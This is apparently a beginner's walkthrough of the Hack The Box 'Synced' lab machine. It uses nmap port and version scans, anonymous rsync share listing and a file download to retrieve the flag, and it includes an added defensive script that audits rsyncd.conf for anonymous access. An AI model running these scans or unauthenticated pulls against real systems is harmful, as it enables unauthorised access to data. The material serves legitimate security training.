The aim of this walkthrough is to provide help with the Synced machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
You could use the unset command to remove it after you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: What is the default port for rsync?
The answer I found on the internet was either the port used by the SSH connection, or TCP port 873.
873
TASK 2
Question: How many TCP ports are open on the remote host?
Scan all TCP ports on the target machine with nmap. Only one appears to be open.
└──╼ $nmap -p- $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 21:53 BST
Nmap scan report for 10.129.228.37
Host is up (0.010s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
873/tcp open rsync
Nmap done: 1 IP address (1 host up) scanned in 246.65 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
1
TASK 3
Question: What is the protocol version used by rsync on the remote machine?
Service/version detection can be done via the -sV option in nmap.
┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 873 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 22:01 BST
Nmap scan report for 10.129.228.37
Host is up (0.011s latency).
PORT STATE SERVICE VERSION
873/tcp open rsync (protocol version 31)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.49 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
31
TASK 4
Question: What is the most common command name on Linux to interact with rsync?
One way is to use apropos, which searches the names and descriptions of the installed man pages for any mention of rsync.
┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $apropos rsync
rrsync (1) - a script to setup restricted rsync users via ssh logins
rsync (1) - a fast, versatile, remote (and local) file-copying tool
rsync-ssl (1) - a helper script for connecting to an ssl rsync daemon
rsyncd.conf (5) - configuration file for rsync in daemon mode
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
rsync
TASK 5
Question: What credentials do you have to pass to rsync in order to use anonymous authentication? (Options: anonymous:anonymous, anonymous, None, rsync:rsync)
Well, the hint and the answer box kinda give it away. Otherwise, use the internet.
Then try accessing the remote machine. One important thing to note is the addressing format; look through rsync’s man page to find the correct one.
# in the rsync man page
...
Access via rsync daemon:
Pull:
rsync [OPTION...] [USER@]HOST::SRC... [DEST]
...
Running the command without any options lists the shares on the remote machine.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::
public Anonymous Share
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
None
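The share above answers without credentials because its module in rsyncd.conf has no auth users set. The following is an added example, not part of the original walkthrough: a small audit that reads an rsyncd.conf and flags modules open to anonymous access. The sample config, its module names and its paths are constructed for illustration.

```shell
# Added example: flag rsync daemon modules reachable without credentials.
# Constructed sample rsyncd.conf; module names and paths are made up.
SAMPLE_CONF='# global section: module parameters set here become defaults
read only = yes

[public]
    comment = Anonymous Share
    path = /srv/public

[backups]
    path = /srv/backups
    auth users = backup
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/24

[upload]
    path = /srv/upload
    read only = no
'

# Reads rsyncd.conf text on stdin, prints one "module: finding" line each.
audit_rsyncd_conf() {
  awk '
    function report() {
      if (mod == "") return
      if (p["authusers"] == "") {
        print mod ": anonymous access (no auth users)"
        if (tolower(p["readonly"]) ~ /^(no|false|0)$/) print mod ": anonymous write (read only disabled)"
      }
      if (p["hostsallow"] == "") print mod ": no hosts allow restriction"
    }
    /^[ \t]*#/ || /^[ \t]*$/ { next }          # comments and blank lines
    /^[ \t]*\[/ {                               # new [module] section
      report(); mod = $0
      sub(/^[ \t]*\[/, "", mod); sub(/\].*$/, "", mod)
      split("", p); for (k in g) p[k] = g[k]   # start from global defaults
      next
    }
    {
      i = index($0, "="); if (i == 0) next
      k = tolower(substr($0, 1, i - 1)); gsub(/[ \t]/, "", k)  # whitespace in names is ignored
      v = substr($0, i + 1); gsub(/^[ \t]+|[ \t]+$/, "", v)
      if (mod == "") g[k] = v; else p[k] = v
    }
    END { report() }
  '
}

printf "%s" "$SAMPLE_CONF" | audit_rsyncd_conf
```

On a real server, feed it the daemon's own config instead of the sample, for example: audit_rsyncd_conf < /etc/rsyncd.conf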
TASK 6
Question: What is the option to only list shares and files on rsync? (No need to include the leading -- characters)
Use rsync’s built-in help option. But interestingly, running the command without any options (like in TASK 5) delivers the same results.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync --help
...
--list-only list the files instead of copying them
...
Let’s try it on the target machine.
┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync --list-only $rhost::
public Anonymous Share
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
But snooping around a bit reveals something interesting.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::public
drwxr-xr-x 4,096 2022/10/24 23:02:23 .
-rw-r--r-- 33 2022/10/24 22:32:03 flag.txt
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
list-only
SUBMIT FLAG
Question: Submit root flag
Copy the file containing the flag to your local machine.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $rsync $rhost::public/flag.txt ./flag.txt
Grab the flag.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $cat flag.txt
<flag>
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
flag
Make sure to terminate the target box before you continue with the next machine!